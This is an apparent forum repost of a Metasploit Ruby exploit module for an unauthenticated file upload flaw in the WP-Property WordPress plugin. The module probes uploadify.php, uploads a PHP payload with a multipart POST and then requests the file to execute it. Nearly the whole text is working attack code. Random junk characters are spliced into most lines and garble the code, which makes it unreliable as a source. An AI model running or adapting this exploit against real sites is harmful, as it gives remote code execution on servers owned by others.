WordPress WP-Property PHP 文件上传漏洞- U# u# ^% G) |& L6 e
' j% w& R8 _, O
## # This file is part of the Metasploit Framework and may be subject to" f+ w: }" z* f, }& C- p _
/ Y# b9 K8 z" t# redistribution and commercial restrictions. Please see the Metasploit
1 H( [; u" V" F5 t, O' `
+ D6 y' ?! v$ }/ n$ t# Framework web site for more information on licensing and terms of use.
5 L3 \/ e! G# z: u
4 y% D3 }' f; F( u$ X* F. E# http://metasploit.com/framework/ ##
4 O/ W( {' i, f( U% N' M$ T
9 c2 I! k5 r- u' ^) m% p
g; s% H' h' j! }
. r( ~( ~7 n# ]# g t ; p; Z7 i/ d; H' O/ h! c8 r& D
$ |+ X- g7 C, E/ e/ C
require 'msf/core'6 o5 M% T# {* s1 Z7 O, L
require 'msf/core/exploit/php_exe'
' }/ k& A# { ~0 B2 M; \& C2 |# r5 J8 z) A4 N3 P2 S
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit:hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
; S. X$ o$ W& M/ F( F'Description' => %q{( Q( |: w0 G, G3 l
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>, S! K- B3 V& k& j8 `: h" j
[$ a6 L$ w8 E3 |+ \& H. m7 j
'Sammy FORGIT', # initial discovery6 Y; j6 V; ~" T& U1 p1 m/ w
'James Fitts <fitts.james[at]gmail.com>' # metasploit module4 ]% T+ ?" Q- W% `
],3 R% z' `* v7 c7 o
'License' => MSF_LICENSE,
) c/ [( ~# L6 R+ H" T7 W+ g'References' =>
. w& {, p+ @7 D: E5 B6 M[) }4 L) g+ W, r# @& w# E
[ 'OSVDB', '82656' ],
) J5 `$ ]3 V6 b: @1 f# \. L[ 'BID', '53787' ],8 v% U. E0 h, h4 e3 ?. J3 v6 c5 F
[ 'EDB', '18987'],$ N! K, A# G/ f" h, B/ Q' k
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]4 _7 X G% r6 | j' n& T1 k
],6 S/ z5 n) [9 S5 Z- K
'Payload' =>3 v2 e. Z( p) K2 _" ~8 i4 O/ j
{4 q& a) g( \+ j! x1 r% L( O# F5 L
'BadChars' => "\x00",
2 ?; S) v! E0 A* {$ q2 [},: X7 Z. }; G1 M5 r4 ^- W- B
'Platform' => 'php',1 Y- Q5 T$ d- Y1 M; }3 w
'Arch' => ARCH_PHP,- A. u+ T3 |! c$ [4 y
'Targets' =>
8 R6 X; @8 y: }[
+ `$ u2 b# }& M2 r. O* x[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
! p* i# }$ `9 Y7 q! z5 `[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]8 X$ x. U3 G8 @. z/ R) L+ L: i
],6 X/ }4 a! L) g' V3 W5 M' P
'DefaultTarget' => 0,- j9 x7 g. g q. M; M
'DisclosureDate' => 'Mar 26 2012'))
, W3 e( A: L5 e9 j Y
" F8 V+ C2 |0 s, C" I' u* y* p- |register_options(& g1 e2 Q0 O1 ~
[; @; e q, G! }# L- m
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
2 {. y! G9 A, j q# S# O], self.class)7 Y8 H; ?5 k: ?5 Q- ?
end" r: j& N4 \3 g/ o. B1 {2 Z" i2 o. h
! m. B0 i! G2 g& Z
def check4 t) o: U6 q! ?" u0 h$ |
uri = target_uri.path0 b' X0 |3 U, c' _0 i
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',; a1 X; ^) P/ V8 a" }
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
2 Z/ J1 U! n- U% W4 P}). C( p3 _+ _) x0 \+ `! N# W
" d$ |1 E* b, A% `if not res or res.code != 200
6 x$ y9 D. ^+ ~$ I: ?return Exploit::CheckCode::Unknown6 s; h! ?0 Y( x! g
end! H) F3 Z+ }+ i4 G' q7 N
3 W/ r1 q7 y$ }; w& k# T
return Exploit::CheckCode::Appears
- g+ `+ |. D' |8 O3 Q2 v1 f# Lend D# B% P: J. p9 l; o% |( H7 i/ u
& }3 `! l3 o/ T0 Z6 \) Ddef exploit
' m# }1 d! M6 i4 _0 x; ouri = target_uri.path
0 V0 E2 E" D1 s2 b3 D4 L% yuri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
2 i- F* l6 [- W" l& u* t! Y: x" g9 U) ]1 L4 U/ c6 c8 b! M4 M
data = Rex::MIME::Message.new$ `6 a& g6 L3 t
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")) ?& l0 V% w' b. d
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")7 b9 b% d b# B8 L' h2 p" U- d
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
4 `' \. d! u4 {: c6 A2 A
5 S4 h2 m6 l8 } yprint_status("#{peer} - Uploading payload #{@payload_name}") A& U0 _$ B( B% d
res = send_request_cgi({3 i8 N7 U% Y: A* }/ m0 z
'method' => 'POST',8 ^3 L! o" ]* ?0 Y+ Q Q6 h' @) g
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",! D1 L/ C+ v/ X0 Z. g
'ctype' => "multipart/form-data; boundary=#{data.bound}",: Y: J5 T, S5 Y+ W* y% r; N- Q% \
'data' => post_data
0 K' w8 ]- w- e- o( j- e# q5 g! Z})
( i0 C0 I* a. j+ w3 I# ]$ K0 J' x& @2 A6 w2 N4 _+ E y% N# f; M' H
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
: i1 b) b' t, l) \- o" }fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")& j. G0 P9 g5 C" s
end
4 L' C6 ~: y, v& ^1 k5 n
' X9 A! V* p0 M& q; w' @) {1 O) U; Iupload_uri = res.body8 u; s# A( w2 x7 z7 n1 ?
, A" l$ O) t; P/ g8 o/ R# u5 z
print_status("#{peer} - Executing payload #{@payload_name}")3 `1 x B, \ }4 t' P4 ^
res = send_request_raw({1 \/ ?3 t8 u c9 K
'uri' => upload_uri,) {4 q, o+ Q. }: Z. p5 n- @9 Q3 d
'method' => 'GET'
, W) t! w A/ S: Z0 e})& `! K$ ~% `1 e2 x; ?9 ?# H
end
! l! b3 w$ H4 Hend
% B" J6 E7 G* `. i& v- A' s" y6 t C) _" x
不要问我这写的是什么 怎么利用 我是说msf.
% k2 j+ h* | l0 R4 F
" R T9 l: ^3 n. l( R |